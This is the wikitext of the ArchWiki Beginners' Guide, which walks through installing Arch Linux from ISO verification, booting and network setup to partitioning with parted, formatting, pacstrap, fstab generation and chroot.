[[es:Beginners' Guide]]<br />
[[fa:راهنمای تازهکارها]]<br />
[[fr:Installation]]<br />
[[he:Beginners' Guide]]<br />
[[hr:Beginners' Guide]]<br />
[[hu:Beginners' Guide]]<br />
[[id:Beginners' Guide]]<br />
[[it:Beginners' Guide]]<br />
[[ja:Beginners' Guide]]<br />
[[ko:Beginners' Guide]]<br />
[[lt:Beginners' Guide]]<br />
[[nl:Beginners' Guide]]<br />
[[pl:Beginners' Guide]]<br />
[[pt:Beginners' Guide]]<br />
[[ro:Ghidul începătorilor]]<br />
[[ru:Beginners' guide]]<br />
[[sk:Beginners' Guide]]<br />
[[sr:Beginners' Guide]]<br />
[[sv:Nybörjarguiden]]<br />
[[tr:Yeni başlayanlar rehberi]]<br />
[[uk:Beginners' Guide]]<br />
[[zh-CN:Beginners' guide]]<br />
[[zh-TW:Beginners' Guide]]<br />
{{Related articles start}}<br />
{{Related|:Category:Accessibility}}<br />
{{Related|Installation guide}}<br />
{{Related|Diskless system}}<br />
{{Related|Install from SSH}}<br />
{{Related|General recommendations}}<br />
{{Related|General troubleshooting}}<br />
{{Related articles end}}<br />
This document will guide you through the process of installing [[Arch Linux]] using the [https://projects.archlinux.org/arch-install-scripts.git/ Arch Install Scripts]. Before installing, you are advised to skim over the [[FAQ]].<br />
<br />
The community-maintained [[Main page|ArchWiki]] is the primary resource that should be consulted if issues arise. The [[IRC channel]] (irc://irc.freenode.net/#archlinux) and the [https://bbs.archlinux.org/ forums] are also excellent resources if an answer cannot be found elsewhere. In accordance with [[the Arch Way]], you are encouraged to type {{ic|man ''command''}} to read the [[man page]] of any command you are unfamiliar with.<br />
<br />
== System requirements ==<br />
<br />
Arch Linux should run on any [[Wikipedia:P6 (microarchitecture)|i686]] compatible machine with a minimum of 256 MB RAM. A basic installation with all packages from the {{Grp|base}} group should take less than 800 MB of disk space. If you are working with limited space, this can be trimmed down considerably, but you will have to know what you are doing.<br />
<br />
== Prepare the latest installation medium ==<br />
<br />
{{Tip|The [https://downloads.archlinux.de/iso/archboot/latest archboot] ISO images can take several steps explained in this guide [[Archboot#Interactive_setup_features|interactively]]. See [[Archboot]] for details.}}<br />
<br />
The installation media can be acquired from [https://archlinux.org/download/ Download] page. The single ISO image supports both 32bit and 64bit. Always use the latest ISO image where possible.<br />
<br />
Install images are signed and it is highly recommended to verify their signature before use. Download the ''PGP signature'' to the ISO directory, and run:<br />
<br />
$ gpg --verify archlinux-''version''-dual.iso.sig<br />
<br />
If the public key is not found, [https://sparewotw.wordpress.com/2012/10/31/how-to-verify-signature-using-sig-file/ import] it with {{ic|gpg --recv-keys}}. <br />
<br />
Alternatively, run from an existing Arch Linux installation:<br />
<br />
$ pacman-key -v archlinux-2015.01.01-dual.iso.sig<br />
<br />
{{ic|md5}} and {{ic|sha1}} sums can be checked with ''md5sum'' and ''sha256sum'' respectively.<br />
<br />
=== USB and optical drives ===<br />
<br />
See [[Optical disc drive#Burning]] (CD/DVD) or [[USB flash installation media]] (USB).<br />
<br />
=== Installing over the network ===<br />
<br />
See [[PXE]].<br />
<br />
=== Install from an existing Linux system ===<br />
<br />
See [[Install from existing Linux]]. This is particularly useful when installing Arch remotely via [[VNC]] or [[SSH]]. See also [[Install from SSH]].<br />
<br />
=== Installing on a virtual machine ===<br />
<br />
Installing on a [[Wikipedia:Virtual machine|virtual machine]] is a good way to become familiar with Arch Linux and its installation procedure without leaving your current operating system and repartitioning the storage drive. Some users may find it beneficial to have an independent Arch Linux system on a virtual drive, for testing purposes.<br />
<br />
See [[:Category:Hypervisors]] for examples.<br />
<br />
The exact procedure for preparing a virtual machine depends on the software, but will generally follow these steps:<br />
<br />
# Create the virtual disk image that will host the operating system.<br />
# Properly configure the virtual machine parameters.<br />
# Boot the downloaded ISO image with a virtual CD drive.<br />
# Continue with [[#Boot the installation medium|Boot the installation medium]].<br />
<br />
The following articles may be helpful:<br />
<br />
* [[VirtualBox#Installation steps for Arch Linux guests]]<br />
* [[VirtualBox#Install a native Arch Linux system from VirtualBox]]<br />
* [[Virtualbox#Run a native Arch Linux installation inside VirtualBox]]<br />
* [[Installing Arch Linux in VMware|Arch Linux as VMware guest]]<br />
* [[Moving an existing install into (or out of) a virtual machine]]<br />
<br />
== Boot the installation medium ==<br />
<br />
Most modern systems allow you to select the boot device during the [[Wikipedia:Power-on self test|POST]] phase, usually by pressing the {{ic|F12}} key while the BIOS splash screen is visible. Select the device which contains the Arch ISO. Alternatively, you may need to change the boot order in your computer's BIOS.<br />
<br />
To do this, press a key (usually {{ic|Delete}}, {{ic|F1}}, {{ic|F2}}, {{ic|F11}}, {{ic|F12}} or {{ic|Esc}}) during the [[Wikipedia:Power-on self test|POST]] phase. This will take you into the BIOS settings screen where you can set the order in which the system searches for devices to boot from. Set the device which contains the Arch ISO as the first device from which boot is attempted. Select "Save & Exit" (or your BIOS's equivalent) and the computer should then complete its normal boot process.<br />
<br />
When the Arch menu appears, select "Boot Arch Linux" and press {{ic|Enter}} to enter the live environment where you will run the actual installation (if booting from a UEFI boot disk, the option may look more like "Arch Linux archiso x86_64 UEFI").<br />
<br />
=== Testing if you are booted into UEFI mode ===<br />
<br />
In case you have a [[Unified Extensible Firmware Interface|UEFI]] motherboard and UEFI Boot mode is enabled (and is preferred over BIOS/Legacy mode), the CD/USB will automatically launch Arch Linux via [[Gummiboot]] and you will get the following menu (white letters on black background), with the first item highlighted:<br />
{{bc|<br />
Arch Linux archiso x86_64 UEFI USB<br />
UEFI Shell x86_64 v1<br />
UEFI Shell x86_64 v2<br />
EFI Default Loader}}<br />
<br />
If you do not remember which menu you had at boot time, or if you want to make sure you booted into UEFI mode, run:<br />
<br />
# efivar -l<br />
<br />
If ''efivar'' lists the UEFI variables properly, then you have booted in UEFI mode. If not check whether all the requirements listed in [[Unified Extensible Firmware Interface#Requirements for UEFI Variables support to work properly|Unified Extensible Firmware Interface]] are met.<br />
<br />
{{Warning|While the choice to install in EFI mode is forward looking, early UEFI implementations of a variety of vendors carried more bugs than the BIOS modes. If you have not done so, better do a related search for the particular model (e.g. in the wiki, forum or elsewhere) before installation to avoid problems.}}<br />
<br />
=== Troubleshooting boot problems ===<br />
<br />
* If the screen goes blank with an [[Intel]] video chipset, the problem may be due to [[KMS]]. See [[Intel#Blank screen during boot, when "Loading modules"]] and [[KMS#Disabling modesetting]].<br />
* If the screen does ''not'' go blank and the boot process gets stuck while trying to load the kernel, press {{ic|Tab}} while hovering over the menu entry, type {{ic|1=acpi=off}} at the end of the string and press {{ic|Enter}}.<br />
<br />
== Keyboard layout ==<br />
<br />
You are now presented with a [[Zsh]] shell prompt, logged in as the root user. ''Zsh'' provides advanced tab completion and other features as part of the [http://grml.org/zsh/ grml config]. For editing text files, the console editor [[nano#Usage|nano]] is suggested. See [[Windows and Arch Dual Boot]] if you plan on dual-booting with Windows.<br />
<br />
{{Note|Changes here ''only'' affect the installation process.}}<br />
<br />
The default keyboard layout is set to [[Wikipedia:File:KB United States-NoAltGr.svg|US]], the [[locale]] to {{ic|en_US.UTF-8}}. To change the keyboard layout, run:<br />
<br />
# loadkeys ''layout''<br />
<br />
where ''layout'' is a two-letter [[Wikipedia:ISO 3166-1 alpha-2#Officially assigned code elements|country code]]. Use {{ic|localectl list-keymaps}} to list all available keymaps.<br />
<br />
If certain special characters appear as white squares or other symboles, you may wish to change the console font. See [[Fonts#Previewing_and_testing]] for details.<br />
<br />
== Establish an internet connection ==<br />
<br />
{{Warning|As of [http://cgit.freedesktop.org/systemd/systemd/tree/NEWS?id&#61;dee4c244254bb49d1ffa8bd7171ae9cce596d2d0 v197], udev no longer assigns network interface names according to the ''wlanX'' and ''ethX'' naming scheme. If you are coming from a different distribution or are reinstalling Arch and not aware of the new interface naming style, please do not assume that your wireless interface is named ''wlan0'', or that your wired interface is named ''eth0''. You can use the command {{ic|ip link}} to discover the names of your interfaces.}}<br />
<br />
The ''dhcpcd'' network daemon starts automatically during boot and it will attempt to start a wired connection. Try to ping a server to see if a connection was established. For example, Google's webservers:<br />
<br />
{{hc|# ping -c 3 www.google.com|2=<br />
PING www.l.google.com (74.125.132.105) 56(84) bytes of data.<br />
64 bytes from wb-in-f105.1e100.net (74.125.132.105): icmp_req=1 ttl=50 time=17.0 ms<br />
64 bytes from wb-in-f105.1e100.net (74.125.132.105): icmp_req=2 ttl=50 time=18.2 ms<br />
64 bytes from wb-in-f105.1e100.net (74.125.132.105): icmp_req=3 ttl=50 time=16.6 ms<br />
<br />
--- www.l.google.com ping statistics ---<br />
3 packets transmitted, 3 received, 0% packet loss, time 2003ms<br />
rtt min/avg/max/mdev = 16.660/17.320/18.254/0.678 ms<br />
}}<br />
<br />
If you get a {{ic|ping: unknown host}} error, first check if there is an issue with your cable or wireless signal strength. If not, you will need to set up the network manually, as explained below. Once a connection is established move on to [[#Prepare the storage devices]].<br />
<br />
=== Wired ===<br />
<br />
Follow this procedure if you need to set up a wired connection via a static IP address.<br />
<br />
Identify the name of your ethernet interface:<br />
<br />
{{hc|# ip link|<br />
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT<br />
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00<br />
2: enp2s0f0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT qlen 1000<br />
link/ether 00:11:25:31:69:20 brd ff:ff:ff:ff:ff:ff<br />
3: wlp3s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP mode DORMANT qlen 1000<br />
link/ether 01:02:03:04:05:06 brd ff:ff:ff:ff:ff:ff<br />
}}<br />
<br />
In this example, the ethernet interface is {{ic|enp2s0f0}}. If you are unsure, your ethernet interface is likely to start with the letter "e", and unlikely to be "lo" or start with the letter "w".<br />
<br />
See [[Network_configuration#Static_IP_address]] for required settings. Configure a static profile for ''dhcpcd'' in {{ic|/etc/dhcpcd.conf}} with these settings:<br />
<br />
interface enp2s0f0<br />
static ip_address=192.168.0.10/24<br />
static routers=192.168.0.1<br />
static domain_name_servers=192.168.0.1 8.8.8.8<br />
<br />
Restart {{ic|dhcpcd.service}}:<br />
<br />
# systemctl restart dhcpcd.service<br />
<br />
You should now have a working network connection. If you do not, see [[Network configuration]] page.<br />
<br />
=== Wireless ===<br />
<br />
{{Warning|Wireless chipset firmware packages (for cards which require them) are pre-installed under {{ic|/usr/lib/firmware}} in the live environment (on CD/USB stick) '''but must be explicitly installed to your actual system to provide wireless functionality after you reboot into it!''' Package installation is covered later in this guide. Ensure installation of both your wireless module and firmware before rebooting! See [[Wireless network configuration]] if you are unsure about the requirement of corresponding firmware installation for your particular chipset.}}<br />
<br />
Use [[netctl]]'s ''wifi-menu'' to connect to a wireless network:<br />
<br />
# wifi-menu<br />
<br />
This should bring you a menu of wifi networks if your computer has only one Wi-Fi device (mostly the case in laptops).<br />
<br />
If your computer has more than one Wi-Fi device, you need to choose one and pass its interface name to ''wifi-menu''. First, identify the name of the needed interface:<br />
<br />
{{hc|# iw dev|2=<br />
phy#0<br />
Interface wlp3s0<br />
ifindex 3<br />
wdev 0x1<br />
addr 00:11:22:33:44:55<br />
type managed<br />
}}<br />
<br />
This example shows {{ic|wlp3s0}} as the only available wireless interface, for simplicity. If you are unsure, wireless interfaces are likely to start with the letter "w", and unlikely to be "lo" or start with the letter "e".<br />
<br />
Now try ''wifi-menu'' again by passing it the interface name:<br />
<br />
# wifi-menu wlp3s0<br />
<br />
See the sample configuration in [[WPA2 Enterprise#netctl]] for networks that require both a username and password.<br />
<br />
You should now have a working wireless network connection. If you do not or even failed to identify the wireless interface, see [[#Without wifi-menu]] below or the detailed [[Wireless network configuration]] page.<br />
<br />
==== Without wifi-menu ====<br />
<br />
Bring the interface up with:<br />
<br />
# ip link set wlp3s0 up<br />
<br />
To verify that the interface is up, inspect the output of the following command:<br />
<br />
{{hc|# ip link show wlp3s0|<br />
3: wlp3s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state DOWN mode DORMANT group default qlen 1000<br />
link/ether 00:11:22:33:44:55 brd ff:ff:ff:ff:ff:ff<br />
}}<br />
<br />
The {{ic|UP}} in {{ic|<BROADCAST,MULTICAST,UP,LOWER_UP>}} is what indicates the interface is up, not the later {{ic|state DOWN}}.<br />
<br />
Most wireless chipsets require firmware in addition to a corresponding driver. The kernel tries to identify and load both automatically. If you get output like {{ic|SIOCSIFFLAGS: No such file or directory}}, this means you will need to manually load the firmware. If unsure, invoke ''dmesg'' to query the kernel log for a firmware request from the wireless chipset. For example, if you have an Intel chipset which requires and has requested firmware from the kernel at boot:<br />
<br />
{{hc|<nowiki># dmesg | grep firmware</nowiki>|<br />
firmware: requesting iwlwifi-5000-1.ucode<br />
}}<br />
<br />
If there is no output, it may be concluded that the system's wireless chipset does not require firmware.<br />
<br />
Next, scan for available networks using {{ic|iw dev wlp3s0 scan <nowiki>|</nowiki> grep SSID}}, then connect to a network with:<br />
<br />
# wpa_supplicant -B -i wlp3s0 -c <(wpa_passphrase "''ssid''" "''psk''")<br />
<br />
You need to replace {{ic|''ssid''}} with the name of your network and {{ic|''psk''}} with your wireless password, '''leaving the quotes around the network name and password'''.<br />
<br />
Finally, you have to give your interface an IP address. This can be set manually or using dhcp:<br />
<br />
# dhcpcd wlp3s0<br />
<br />
If that does not work, issue the following commands:<br />
<br />
# echo 'ctrl_interface=DIR=/run/wpa_supplicant' > /etc/wpa_supplicant.conf<br />
# wpa_passphrase "''ssid''" "''psk''" >> /etc/wpa_supplicant.conf<br />
# ip link set ''interface'' up<br />
# wpa_supplicant -B -D nl80211,wext -c /etc/wpa_supplicant.conf -i ''interface''<br />
# dhcpcd -A ''interface''<br />
<br />
Setting the interface up at step 3 may not be needed, but does no harm in any case.<br />
<br />
=== Analog modem, ISDN, or PPPoE DSL ===<br />
<br />
For xDSL, dial-up, and ISDN connections, see [[Direct Modem Connection]].<br />
<br />
=== Behind a proxy server ===<br />
<br />
If you are behind a proxy server, you will need to export the {{ic|http_proxy}} and {{ic|ftp_proxy}} environment variables. See [[Proxy settings]] for more information.<br />
<br />
== Prepare the storage devices ==<br />
<br />
In this step, the storage devices that will be used by the new system will be prepared. Read [[Partitioning]] for a more general overview.<br />
<br />
{{Warning|Partitioning will destroy existing data. Before proceeding, you '''must''' backup all data that needs to be preserved.}}<br />
<br />
{{Tip|<br />
* Users intending to create stacked block devices for [[LVM]], [[disk encryption]] or [[RAID]], should keep those instructions into consideration when preparing the partitions.<br />
* If intending to install to a USB flash key, see [[Installing Arch Linux on a USB key]].}}<br />
<br />
=== Identify the devices ===<br />
<br />
The first step is identify the devices where the new system will be installed. The following command will show all the available devices:<br />
<br />
# lsblk<br />
<br />
This will list all devices connected to your system along with their partition schemes, including that used to host and boot live Arch installation media (e.g. a USB drive). Not all devices listed will therefore be viable or appropriate mediums for installation. To filter out inappropriate results, the command can optionally be amended as follows:<br />
<br />
# lsblk | grep -v "rom\|loop\|airoot"<br />
<br />
Devices (e.g. hard disks) will be listed as {{ic|sd''x''}}, where {{ic|''x''}} is a lower-case letter starting from {{ic|a}} for the first device ({{ic|sda}}), {{ic|b}} for the second device ({{ic|sdb}}), and so on. Existing partitions on those devices will be listed as {{ic|sd''xY''}}, where {{ic|''Y''}} is a number starting from {{ic|1}} for the first partition, {{ic|2}} for the second, and so on. In the example below, only one device is available ({{ic|sda}}), and that device uses only one partition ({{ic|sda1}}):<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
sda 8:0 0 80G 0 disk<br />
└─sda1 8:1 0 80G 0 part<br />
<br />
The {{ic|sd''xY''}} convention will be used in the examples provided below for partition tables, partitions, and file systems. As they are just examples, it is important to ensure that any necessary changes to device names, partition numbers, and/or partition sizes (etc.) are made. Do not just blindly copy and paste the commands.<br />
<br />
If the existing partition scheme needs not be changed, skip to [[#Create filesystems]], otherwise continue reading the following section.<br />
<br />
=== Partition table types ===<br />
<br />
If you are installing alongside an existing installation (i.e. dual-booting), a partition table will already be in use. If the devices are not partitioned, or the current partitions table or scheme needs to be changed, you will first have to determine the partition tables (one for each device) in use or to be used.<br />
<br />
{{Warning|If Arch and Windows are dual-booting from same device, then Arch '''must''' follow the same firmware boot mode and partitioning combination already used, or Windows will fail to boot. See [[Windows and Arch Dual Boot#Important information]] for more details.}}<br />
<br />
There are two types of partition table:<br />
<br />
* [[Master Boot Record| MBR]]: Intended for BIOS systems (also referred to as "msdos")<br />
* [[GUID Partition Table| GPT]]: Intended for UEFI systems<br />
<br />
Any existing partition table can be identified with the following command for each device:<br />
<br />
# parted /dev/sd''x'' print<br />
<br />
=== Partitioning tools ===<br />
<br />
For each device to be partitioned, a proper tool must be chosen according to the partition table to be used. Several partitioning tools are provided by the Arch installation medium, including:<br />
<br />
* [[parted]]: MBR and GPT<br />
* [[Partitioning#Fdisk usage summary|fdisk]], '''cfdisk''', '''sfdisk''': MBR and GPT<br />
* [[Partitioning#Gdisk usage summary|gdisk]], '''cgdisk''', '''sgdisk''': GPT<br />
<br />
{{Warning|Using a partitioning tool that is incompatible with your partition table type will likely result in the destruction of that table, along with any existing partitions/data.}}<br />
<br />
{{Tip|The devices may also be partitioned before booting the Arch installation media, possibly using alternative live systems with other partitioning tools. For example beginners might find it easier to use a graphical partitioning tool such as [[GParted]], which is also provided as a [http://gparted.sourceforge.net/livecd.php live CD] and works with both MBR and GPT partition tables.}}<br />
<br />
==== Using parted in interactive mode ====<br />
<br />
All the examples provided below make use of ''parted'', as it can be used for both BIOS/MBR and UEFI/GPT. It will be launched in ''interactive mode'', which simplifies the partitioning process and reduces unnecessary repetition by automatically applying all partitioning commands to the specified device.<br />
<br />
In order to start operating on a device, execute:<br />
<br />
# parted /dev/sd''x''<br />
<br />
You will notice that the command-line prompt changes from a hash ({{ic|#}}) to {{ic|(parted)}}: this also means that the new prompt is not a command to be manually entered when running the commands in the examples.<br />
<br />
To see a list of the available commands, enter:<br />
<br />
(parted) help<br />
<br />
When finished, or if wishing to implement a partition table or scheme for another device, exit from parted with:<br />
<br />
(parted) quit<br />
<br />
After exiting, the command-line prompt will change back to {{ic|#}}.<br />
<br />
=== Create new partition table ===<br />
<br />
You need to (re)create the partition table of a device when it has never been partitioned before, or when you want to change the type of its partition table. Recreating the partition table of a device is also useful when the partition scheme needs to be restructured from scratch.<br />
<br />
{{Warning|<br />
* If dual-booting with an existing installation of Windows on a UEFI/GPT system, do not erase the partition table. Doing so will destroy all existing data on the device, including the UEFI partition with the Windows ''.efi'' file required to boot it.<br />
* MBR is designed specifically for use with BIOS systems, and GPT is designed for UEFI. It is not recommended for less experienced users to break this convention as both have features and/or limitations that may be incompatible with your hardware (e.g. MBR cannot cope with devices larger than 2 TiB). [https://www.happyassassin.net/2014/01/25/uefi-boot-how-does-that-actually-work-then/] If for any reason you do not wish to follow this convention, see [http://mjg59.dreamwidth.org/8035.html] and [http://rodsbooks.com/gdisk/bios.html] for more information and possible workarounds.}}<br />
<br />
Open each device whose partition table must be (re)created with:<br />
<br />
# parted /dev/sd''x''<br />
<br />
To then create a new MBR/msdos partition table for BIOS systems, use the following command:<br />
<br />
(parted) mklabel msdos<br />
<br />
To create a new GPT partition table for UEFI systems instead, use:<br />
<br />
(parted) mklabel gpt<br />
<br />
=== Partition schemes ===<br />
<br />
You can decide the number and size of the partitions the devices should be split into, and which directories will be used to mount the partitions in the installed system (also known as ''mount points''). The mapping from partitions to directories is the [[Partitioning#Partition scheme|partition scheme]], which must comply with the following requirements:<br />
<br />
* At least a partition for the {{ic|/}} (''root'') directory '''must''' be created.<br />
* Depending on the motherboard's firmware interface, the chosen [[#Partition table types]], and in some cases also the chosen [[boot loader]], the following additional partitions '''must''' be created:<br />
** '''BIOS/MBR''': no additional partition required.<br />
** '''BIOS/GPT''':<br />
*** If using [[syslinux]]: no additional partition required.<br />
*** If using [[GRUB]]: one [[GRUB#GUID Partition Table (GPT) specific instructions|BIOS Boot Partition]].<br />
** '''UEFI/GPT''': one [[Unified Extensible Firmware Interface#EFI System Partition|EFI System Partition]].<br />
** '''UEFI/MBR''': one [[Unified Extensible Firmware Interface#EFI System Partition|EFI System Partition]].<br />
<br />
In the examples below it is assumed that a new and contiguous partitioning scheme is applied to a single device. Some optional partitions will also be created for the {{ic|/boot}} and {{ic|/home}} directories: see also [[Arch filesystem hierarchy]] for an explanation of the purpose of the various directories; if separate partitions for directories like {{ic|/boot}} or {{ic|/home}} are not created, these will simply be contained in the {{ic|/}} partition. Also the creation of an optional partiton for [[swap space]] will be illustrated.<br />
<br />
If not already open in a ''parted'' interactive session, open each device to be partitioned with:<br />
<br />
# parted /dev/sd''x''<br />
<br />
The following command will be used to create partitions:<br />
<br />
(parted) mkpart ''part-type'' ''fs-type'' ''start'' ''end''<br />
<br />
* {{ic|''part-type''}} is one of {{ic|primary}}, {{ic|extended}} or {{ic|logical}}, and is meaningful only for MBR partition tables.<br />
* {{ic|''fs-type''}} is one of the supported file systems listed in the [http://www.gnu.org/software/parted/manual/parted.html#mkpart manual]. The partition will be properly formatted in [[#Create filesystems]].<br />
* {{ic|''start''}} is the beginning of the partition from the start of the device. It consists of a number followed by a [http://www.gnu.org/software/parted/manual/parted.html#unit unit], for example {{ic|1M}} means start at 1MiB.<br />
* {{ic|''end''}} is the end of the partition from the start of the device (''not'' from the {{ic|''start''}} value). It has the same syntax as {{ic|''start''}}, for example {{ic|100%}} means end at the end of the device (use all the remaining space).<br />
<br />
{{Warning|It is important that the partitions do not overlap each other: if you do not want to leave unused space in the device, make sure that each partition starts where the previous one ends.}}<br />
<br />
{{Note|''parted'' may issue a warning like:<br />
<br />
Warning: The resulting partition is not properly aligned for best performance.<br />
Ignore/Cancel?<br />
<br />
In this case, read [[Partitioning#Partition alignment]] and follow [[GNU Parted#Alignment]] to fix it.}}<br />
<br />
The following command will be used to flag the partition that contains the {{ic|/boot}} directory as bootable:<br />
<br />
(parted) set ''partition'' boot on<br />
<br />
* {{ic|''partition''}} is the number of the partition to be flagged (see the output of the {{ic|print}} command).<br />
<br />
==== UEFI/GPT examples ====<br />
<br />
In every instance, a special bootable [[Unified Extensible Firmware Interface#EFI System Partition|EFI System Partition]] is required.<br />
<br />
{{Warning|If dual-booting with an existing installation of Windows on a UEFI/GPT system, the existing UEFI partition must not be deleted. Doing so will destroy the ''.efi'' file required to boot Windows.}}<br />
<br />
If creating a new EFI System Partition, use the following commands (the recommended size is 512MiB):<br />
<br />
(parted) mkpart ESP fat32 1M 513M<br />
(parted) set 1 boot on<br />
<br />
The remaining partition scheme is entirely up to you. For one other partition using 100% of remaining space:<br />
<br />
(parted) mkpart primary ext3 513M 100%<br />
<br />
For separate {{ic|/}} (20GiB) and {{ic|/home}} (all remaining space) partitions:<br />
<br />
(parted) mkpart primary ext3 513M 20.5G<br />
(parted) mkpart primary ext3 20.5G 100%<br />
<br />
And for separate {{ic|/}} (20GiB), swap (4Gib), and {{ic|/home}} (all remaining space) partitions:<br />
<br />
(parted) mkpart primary ext3 513M 20.5G<br />
(parted) mkpart primary linux-swap 20.5G 24.5G<br />
(parted) mkpart primary ext3 24.5G 100%<br />
<br />
==== BIOS/MBR examples ====<br />
<br />
For a minimum single primary partition using all available disk space, the following command would be used:<br />
<br />
(parted) mkpart primary ext3 1M 100%<br />
(parted) set 1 boot on<br />
<br />
In the following instance, a 20Gib {{ic|/}} partition will be created, followed by a {{ic|/home}} partition using all the remaining space:<br />
<br />
(parted) mkpart primary ext3 1M 20G<br />
(parted) set 1 boot on<br />
(parted) mkpart primary ext3 20G 100%<br />
<br />
In the final example below, separate {{ic|/boot}} (100MiB), {{ic|/}} (20Gib), swap (4GiB), and {{ic|/home}} (all remaining space) partitions will be created:<br />
<br />
(parted) mkpart primary ext3 1M 100M<br />
(parted) set 1 boot on<br />
(parted) mkpart primary ext3 100M 20G<br />
(parted) mkpart primary linux-swap 20G 24G<br />
(parted) mkpart primary ext3 24G 100%<br />
<br />
=== Create filesystems ===<br />
<br />
Once the partitions have been created, each must be formatted with an appropriate [[file system]], ''except'' for swap partitions. All available partitions on the intended installation device can be listed with the following command:<br />
<br />
# lsblk /dev/sd''x''<br />
<br />
With the exceptions noted below, it is recommended to use the {{ic|ext4}} file system:<br />
<br />
# mkfs.ext4 /dev/sd''xY''<br />
<br />
{{Warning|If dual-booting with an existing installation of Windows on a UEFI/GPT system, do not re-format the UEFI partition. Doing so will destroy all existing data on that partition, including the Windows ''.efi'' file required to boot it.}}<br />
<br />
{{Note|<br />
* If a new UEFI system partition has been created on a UEFI/GPT system, it must be formatted with a {{ic|fat32}} or {{ic|vfat32}} file system. Failure to do so will result in an unbootable installation:<br />
:{{bc|# mkfs.vfat -F32 /dev/sd''xY''}}<br />
* If you plan to use [[GRUB]] on a BIOS/GPT system, please note that the [[GRUB#GUID Partition Table (GPT) specific instructions|BIOS Boot Partition]] has nothing to do with the {{ic|/boot}} mountpoint. It will be used by GRUB directly. Do not create a filesystem on it, and do not mount it.}}<br />
<br />
=== Activate swap ===<br />
<br />
If a swap partition has been created, it must be set up and activated with:<br />
<br />
# mkswap /dev/sd''xY''<br />
# swapon /dev/sd''xY''<br />
<br />
=== Mount the partitions ===<br />
<br />
{{Note|Swap partitions must '''not''' be mounted here.}}<br />
<br />
The {{ic|/}} (root) partition must be mounted '''first''': this is because any directories such as {{ic|/boot}} or {{ic|/home}} that have separate partitions will have to be created in the root file system. The {{ic|/mnt}} directory of the live system will be used to mount the root partition, and consequently all the other partitions will stem from there. If the root partition's name is {{ic|sd''xR''}}, do:<br />
<br />
# mount /dev/sd''xR'' /mnt<br />
<br />
Once the {{ic|/}} partition has been mounted, any remaining partitions may be mounted in any order. The general procedure is to first create the mount point, and then mount the partition to it. If using a separate {{ic|/boot}} partition:<br />
<br />
# mkdir -p /mnt/boot<br />
# mount /dev/sd''xB'' /mnt/boot<br />
<br />
{{Note|Using {{ic|/boot}} is recommended also for mounting the EFI System Partition on UEFI/GPT system. See [[EFISTUB]] and related articles for alternatives.}}<br />
<br />
If using a separate {{ic|/home}} partition:<br />
<br />
# mkdir -p /mnt/home<br />
# mount /dev/sd''xH'' /mnt/home<br />
<br />
Once all the remaining partitions, if any, have been mounted, the devices are ready to install Arch.<br />
<br />
== Select a mirror ==<br />
<br />
You may want to edit the {{ic|mirrorlist}} file and place your preferred mirror first. A copy of this file will be installed on your new system by ''pacstrap'' as well, so it is worth getting it right.<br />
<br />
{{hc|# nano /etc/pacman.d/mirrorlist|<br />
##<br />
## Arch Linux repository mirrorlist<br />
## Sorted by mirror score from mirror status page<br />
## Generated on YYYY-MM-DD<br />
##<br />
<br />
<nowiki>Server = http://mirror.example.xyz/archlinux/$repo/os/$arch</nowiki><br />
...}}<br />
<br />
If you want, you can make it the ''only'' mirror available by deleting all other lines, but it is usually a good idea to have a few more, in case the first one goes offline.<br />
<br />
{{Tip|<br />
* Use the [https://www.archlinux.org/mirrorlist/ Mirrorlist Generator] to get an updated list for your country. HTTP mirrors are faster than FTP, because of something called [[Wikipedia:HTTP persistent connection|persistent HTTP connection]]: with FTP, ''pacman'' has to establish a new connection to server each time it requests to download next package, resulting in a brief pause. For other ways to generate a mirror list, see [[Mirrors#Sorting mirrors|Sorting mirrors]] and [[Reflector]].<br />
* [https://archlinux.org/mirrors/status/ Arch Linux MirrorStatus] reports various aspects about the mirrors such as network problems with mirrors, data collection problems, the last time mirrors have been synced, etc.<br />
}}<br />
<br />
{{Note|<br />
* Whenever in the future you change your mirrorlist, refresh all package lists with {{ic|pacman -Syyu}}, to ensure that the package lists are updated consistently. See [[Mirrors]] for more information.<br />
* If you are using an older installation medium, your mirrorlist might be outdated, which might lead to problems when updating Arch Linux (see {{Bug|22510}}). Therefore it is advised to obtain the latest mirror information as described above.<br />
}}<br />
<br />
== Install the base system ==<br />
<br />
The base system is installed using the ''pacstrap'' script. The {{ic|-i}} switch can be omitted if you wish to install every package from the {{Grp|base}} group without prompting. <br />
<br />
# pacstrap -i /mnt base<br />
<br />
To build packages from the [[AUR]] or with [[ABS]], you will also need the {{Grp|base-devel}} group.<br />
<br />
# pacstrap -i /mnt base base-devel<br />
<br />
Other packages can be installed later using [[pacman]]. See [[Pacman#Troubleshooting]] and [[Pacman-key#Troubleshooting]] in case of errors.<br />
<br />
== Generate an fstab ==<br />
<br />
Generate an [[fstab]] file with the following command. UUIDs will be used because they have certain advantages (see [[fstab#Identifying filesystems]]). If you would prefer to use labels instead, replace the {{ic|-U}} option with {{ic|-L}}:<br />
<br />
# genfstab -U -p /mnt >> /mnt/etc/fstab<br />
# nano /mnt/etc/fstab<br />
<br />
{{Warning|The {{ic|fstab}} file should always be checked after generating it. If you encounter errors running ''genfstab'' or later in the install process, do '''not''' run ''genfstab'' again; just edit the {{ic|fstab}} file.}}<br />
<br />
The last field determines the order in which partitions are checked at start up: use {{ic|1}} for the (non-Btrfs) root partition, which should be checked first; {{ic|2}} for all other partitions you want checked at start up; and {{ic|0}} means 'do not check' (see [[fstab#Field definitions]]). All [[Btrfs]] partitions should have {{ic|0}} for this field. Normally, you will also want your ''swap'' partition to have {{ic|0}}.<br />
<br />
== Chroot and configure the base system ==<br />
<br />
Next, [[Change root|chroot]] into your newly installed system:<br />
<br />
# arch-chroot /mnt /bin/bash<br />
<br />
At this stage of the installation, you will configure the primary configuration files of your Arch Linux base system. These can either be created if they do not exist, or edited if you wish to change the defaults.<br />
<br />
Closely following and understanding these steps is of key importance to ensure a properly configured system.<br />
<br />
